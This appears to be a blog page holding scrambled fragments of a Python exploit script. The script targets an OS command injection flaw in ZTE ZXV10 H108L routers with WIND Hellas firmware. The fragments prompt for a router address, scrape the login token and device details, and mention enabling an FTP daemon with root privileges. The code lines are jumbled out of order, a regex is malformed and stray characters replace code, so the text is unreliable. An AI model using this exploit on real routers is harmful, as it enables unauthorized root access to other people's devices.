Print "Enabling FTP deamon on " target ".\n" Print "No response on '" cmd "' command!" Print " Serial Number: " GREEN Frm_SerialNumber RESETįrm_SoftwareVerExtent = re.findall(r'Frm_SoftwareVerExtent" class="tdright">(.*)(.*)(.*)(.*) -c', html_data) Print " Login token: " GREEN Frm_Logintoken RESETįrm_ModelName = re.findall(r'Frm_ModelName" class="tdright">(.*)(.*)', html_data)įrm_SerialNumber = str(Frm_SerialNumber) # Check router information on "template.gch" page Request = urllib2.Request(page, do_login) (" Retrieving random login token.\r")įrm_Logintoken = re.findall(r'Frm_Logintoken"\).value = "(.*)" ', html_data) Target = raw_input("\nEnter the address of the ZTE router\n> ") # By using this vulnerability an attacker is able to execute system command with root privileges. # ZTE ZXV10 H108L router with WIND Hellas's custom software is vulnerable to OS Command injection attack.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |